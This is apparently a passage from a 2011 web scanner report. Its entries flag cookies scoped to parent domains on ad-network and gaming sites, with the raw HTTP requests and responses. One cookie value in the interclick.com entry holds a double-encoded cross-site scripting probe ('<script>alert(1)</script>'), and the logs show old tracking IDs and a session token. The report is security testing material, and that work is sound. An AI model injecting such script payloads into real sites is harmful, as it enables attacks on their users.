Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAAYyYClQAAAAA.&pubclick=http://adclick.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/
Cookie: OAX=rcHW801Sn9AACaXG; id=4612530447660445644; mdata=1|4612530447660445644|1311255470

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:01:50 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=4612530447660445644; path=/; expires=Tue, 14-Aug-12 18:01:50 GMT; domain=.mookie1.com
Set-Cookie: session=1311271309|1311271310; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

10.13. http://wow.curse.com/user/NetworkCookie/ajaxSession.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://wow.curse.com
Path:	/user/NetworkCookie/ajaxSession.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

Network.Session=IFKPILULOMJYRMJS; domain=.curse.com; expires=Tue, 20-Jul-2021 04:49:00 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/NetworkCookie/ajaxSession.aspx?cookie=IFKPILULOMJYRMJS HTTP/1.1
Host: wow.curse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: BIGipServer=1932476484.20480.0000; __qca=P0-1080863387-1311396539021; __utma=38553637.1394648258.1311396540.1311396540.1311396540.1; __utmb=38553637.2.10.1311396540; __utmc=38553637; __utmz=38553637.1311396540.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=1629006922-1452092990-1311396540767; _cookieTest=true; Network.TimeLock=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
CommunityServer: 4.0.30619.63
Set-Cookie: Network.Session=IFKPILULOMJYRMJS; domain=.curse.com; expires=Tue, 20-Jul-2021 04:49:00 GMT; path=/
Set-Cookie: Network.Lock=1; domain=.curse.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:49:00 GMT
Content-Length: 83

<html><body><script>parent.Curse.Session.handleLogin(false);</script></body></html>

10.14. http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.yearbook/ford_ron_071911

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; expires=Thu, 18-Aug-2011 18:00:50 GMT; path=/; domain=.collective-media.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adj/cm.yearbook/ford_ron_071911;sz=300x250;ord=1520731557?01AD=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw&01RI=ED7C7B6613CBE56&01NA= HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c; JY57=CT-1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Content-Length: 431
Date: Thu, 21 Jul 2011 18:00:50 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; expires=Thu, 18-Aug-2011 18:00:50 GMT; path=/; domain=.collective-media.net
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 20-Aug-2011 18:00:50 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="
...[SNIP]...

10.15. http://a.netmng.com/hic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

evo5_display=hKn31hJ9q24SwrCsKVHtvYupVI9QLFINGjr%2BmRr8YLXwAyLdvUmC2N2XsEzoQNrOmFE38RQRoG368kINn%2FWgDA%3D%3D; expires=Sat, 25-Jun-44591 18:01:17 GMT; path=/; domain=.netmng.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737354895902192%26l%3D908365%26ad%3D96040%26s%3D917258%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-862839443 HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: evo5=hryjysfdf0upy%7ChmKrC4uqXwyKEq2D0zN7z3w4I9UsaebVw0C8tcmHu3W2hNa0FXsr7rQreKFYfn8aDum9MIBCzH5i6UHr3K8%2B%2FGO0iNX8jxKwnOnl%2Fdwz6Q3nevqW761%2FSPWVjeuthbVgxAfVMpl9pGOuxNbLa%2FAUUAwFQ%2BNAGUP78O2Ea6XX2UwRwaN3KyxZ4YAuk5XSS71KqSAnZx3HX6TOKSmtb8Isi8VHdeTLFj4BdvghV79DeDb0O283Bj8I27%2FJMqWhFOxbhal4JR%2FrVjEuetCnzzZ%2B9TxdqPgTjGPsXEz72rPqCDmab5%2BCFHagvG2BRygZuritvfpnObnfPDTtSqhTTzFBqkA5zV%2Bjcros7mCvT3FoNTqX6osMQGdpmzoY77qZWBbZ; evo5_ii=vcRY%2BVCpUfN0%2BPB1tFnV5yG7u0dcFwU2HUsmkxANIEaW0e99haFIbVN4RXHwO17b99k3tT4krtzpwqtfFqzt7w%3D%3D; evo5_display=dLlGabeGUgWLGMs8D976%2FClUB%2B%2Bwcf164wnglFlBvlw%3D

Response

10.16. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=a6nunmMZaACwDqGpS72crs95D7gxA9FljeQtdXZcgd4PKLao2vyvKW8Kn1jO4ghqfnIZaOTmZbJVrNZcqxd3ZbYwcSnyEteZdZcEZbPV1CPPY; path=/; domain=.tribalfusion.com; expires=Wed, 19-Oct-2011 18:00:38 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=myyearbook&adSpace=myb&tagKey=987828525&th=20001302335&tKey=undefined&size=728x90&flashVer=0&ver=1.20&center=1&url=http%3A%2F%2Fgames.myyearbook.com%2F&rurl=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=11179796&a=1&rnd=11186943 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: ANON_ID=arnsuBNZaiMsmmemFmHgrNv0EYMo8Sge5rfQqfF9SNcEfI31HUhIQ8Fk5tYfTqpJmBgXCiGHdnC3oZcqZcq

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=a6nunmMZaACwDqGpS72crs95D7gxA9FljeQtdXZcgd4PKLao2vyvKW8Kn1jO4ghqfnIZaOTmZbJVrNZcqxd3ZbYwcSnyEteZdZcEZbPV1CPPY; path=/; domain=.tribalfusion.com; expires=Wed, 19-Oct-2011 18:00:38 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 231
Expires: 0
Connection: keep-alive

document.write('<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=
...[SNIP]...

10.17. http://a1.interclick.com/ColDta.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a1.interclick.com
Path:	/ColDta.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tpd=e20=1313868322752&e90=1311881122837&e50=1313868323966&e100=1311881124049; domain=.interclick.com; expires=Sat, 20-Aug-2011 19:25:18 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ColDta.aspx HTTP/1.1
Host: a1.interclick.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/DtCol.aspx
Cookie: T=1; uid=u=7e1f4d20-a8f4-40d3-9d87-6cf2443de920; Aqprep_Banner160X600=160022=634406941334755622:51445; sgm=7472=734338; ucap=sl=0; FC_53=180684=17624151:1; IFC=n=1&w51114=1&a180684=1&e=634469450978326444; Aqprep_Banner728X90=180684=634468586978356444:51114; Li=1=734338&30=734338; tpd=i20=&e20=1313868322752&i90=326a9%252522%25253E%25253Cscript%25253Ealert%2525281%252529%25253C%25252Fscript%25253Efa144a76584&e90=1311881122837&i50=&e50=1313868323966&i100=&e100=1311881124049

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: tpd=e20=1313868322752&e90=1311881122837&e50=1313868323966&e100=1311881124049; domain=.interclick.com; expires=Sat, 20-Aug-2011 19:25:18 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 21 Jul 2011 19:25:18 GMT

GIF89a.............!.......,...........D..;

10.18. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=4146544210108361256; Domain=.turn.com; Expires=Thu, 19-Jan-2012 04:49:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/ads.js?&pub=7393925&code=7399421&cch=7394053&l=728x90&noflash=1&noflashplugin=1&tmz=-5&notop=1&area=-1&res=1920&rnd=0.32648639130663115&url=http%3A%2F%2Fwww.curse.com%2F&3c=http%3A%2F%2Fvapden1.lijit.com%2Fwww%2Fdelivery%2Fck.php%3Foaparams%3D2__zoneid%3D127557__loc%3Dhttp%253A%252F%252Fwww.curse.com%252F__referer%3Dhttp%253A%252F%252Fc627028.r28.cf2.rackcdn.com%252Fgoogle29reddefaultsUSA728x90.html__cb%3D70596e55b6__maxdest%3D&loc=http%3A%2F%2Fc627028.r28.cf2.rackcdn.com%2Fgoogle29reddefaultsUSA728x90.html HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://c627028.r28.cf2.rackcdn.com/v36defaultsusa728x90btf.html
Cookie: uid=4146544210108361256; pf=mAenvXmn4ke9F4owkUorjpz8nd2soE1p3fANzau6scTjVXneUZQjz-3jcHzHECmqJUa5vuXQX69yGrZjgQbSNS1cG_zkQ9dUJMxQhyJcQm5bUEz0GghI6lcIUnv8P45MTOKfOsMnvbgakCOP3yO8wg8tlM3UBKnVqGzVZjq5HNJv_drOifvAQipkEpr82UhJ63vghD1IWWtC1NYjUoqA0fR_VLQ60Y4o8x5YwvLJpP509oJ4f6kfDwfpRi96RGsSXTmvGPd2-A8bAsVXnz-vBG0CMUA3CG7Q62EHfmNT7q_ig7cUXlLlbRIGRjI81HwNR7H9BpK2Ru2H8ZJGWBlO80sZ4sASoHmP3khf-YwcUezwJuNPnTM2vwaRjQm5ghUV9oiM23c4cpSzOByapoFzhtO9BhGI2vFybm8ioFouHJEAibTt0IdueOWdjwalU0GrpKdltnaxLPCt325cV_rFuA; rrs=3%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15176%7C15177%7C15177%7C15177%7C15177; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 25 Jul 2011 04:49:12 GMT
Set-Cookie: uid=4146544210108361256; Domain=.turn.com; Expires=Thu, 19-Jan-2012 04:49:12 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 04:49:12 GMT
Content-Length: 10239

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
if (this.width
...[SNIP]...

10.19. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:00:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=1&sp=y HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: uid=4146544210108361256; pf=nZySyOPeh2ug-66f3S_YJ-08eNO3kJ_g1J0ui0giN0IO9arxyxx0God0z89jjC5u7B_Md7IXVjaLRc76_SNpoZsbEDch1o94tTK7X4mzUCMC35RnwUiMoGkJYCinoxtJgfaE0IC8cyLwhG_8rfNFZKo408BxR9uazB8jKSDnLvk; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7Cundefined%7Cundefined%7C15177%7C15177%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15177; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:00:57 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:57 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=4146544210108361256&rnd=3996838049712860404&fpid=1&nu=n&t=
...[SNIP]...

10.20. http://ads.adap.tv/beacons previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adap.tv
Path:	/beacons

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

adaptv_unique_user_cookie="7419174845235780020__TIME__2011-07-22+21%3A48%3A29";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-43 06:35:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacons?callback=jsonp1311396514352 HTTP/1.1
Host: ads.adap.tv
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-05-10+07%3A22%3A29"; rtbData0="key=turn:value=4146544210108361256:expiresAt=Thu+Jul+28+06%3A37%3A58+PDT+2011:32-Compatible=true"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-07-22+21%3A48%3A29";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-43 06:35:09 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 940

jsonp1311396514352({
"beacons":["http://load.exelator.com/load/?p=104&g=080&j=0&u=1234567&site=2222", "http://adadvisor.net/adscores/g.pixel?sid=9204679687", "http://pix04.revsci.net/A11149/a4/0/0/12
...[SNIP]...

10.21. http://ads.adap.tv/cookie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adap.tv
Path:	/cookie

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

adaptv_unique_user_cookie="7419174845235780020__TIME__2011-07-22+21%3A48%3A29";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-43 06:35:09 GMT
adaptv_page_url=M3h9qeyoFhilJJ6HSKW-InPHBacY8pXAtMzCifxgdT-UiDx/4EkPRWTXLbfiCqu7pHS8vxoWeQv0nianaroGVLMSBFF8IRjleDt5svGVSjdzjPt624rG5HUu/qywG1feoOt0lqLFswM_;Path=/;Domain=.adap.tv

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cookie?pageUrl=http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx&isTop=true&callback=1 HTTP/1.1
Host: ads.adap.tv
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-05-10+07%3A22%3A29"; rtbData0="key=turn:value=4146544210108361256:expiresAt=Thu+Jul+28+06%3A37%3A58+PDT+2011:32-Compatible=true"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
p3p: CP="DEM"
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-07-22+21%3A48%3A29";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-43 06:35:09 GMT
Content-Type: text/html
Set-Cookie: adaptv_page_url=M3h9qeyoFhilJJ6HSKW-InPHBacY8pXAtMzCifxgdT-UiDx/4EkPRWTXLbfiCqu7pHS8vxoWeQv0nianaroGVLMSBFF8IRjleDt5svGVSjdzjPt624rG5HUu/qywG1feoOt0lqLFswM_;Path=/;Domain=.adap.tv
Content-Length: 0

10.22. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PRgo=BBBAAuILBBVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1355334U75720110715143929&flash=0&time=4|13:1|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/q%3B243851531%3B0-0%3B0%3B67592558%3B4307-300/250%3B43168483/43186270/1%3Bu%3D%2Ccm-10306552516_1311271251%2C11fda490648f83c%2Cgames%2Cax.80-bz.25%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-10306552516_1311271251%2C11fda490648f83c%2Cgames%2Cax.80-bz.25%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D218732%3Bcontx%3Dgames%3Ban%3D80%3Bdc%3Dw%3Bbtg%3Dbz.25%3B%7Eaopt%3D2/1/e4/0%3B%7Esscs%3D%3f$CTURL$&r=0.5124368451783178 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PRID=8C4BF8BD-922A-484A-B812-1B920D470E9E; PRbu=EomEAzaM9

Response

10.23. http://adx.adnxs.com/mapuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adx.adnxs.com
Path:	/mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:01:12 GMT; domain=.adnxs.com; HttpOnly
uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:01:12 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; path=/; expires=Wed, 19-Oct-2011 18:01:12 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESEAivP-wt7aKur2tZ_DiVr5c&cver=1 HTTP/1.1
Host: adx.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

10.24. http://ak1.abmr.net/is/a.collective-media.net previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/a.collective-media.net

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

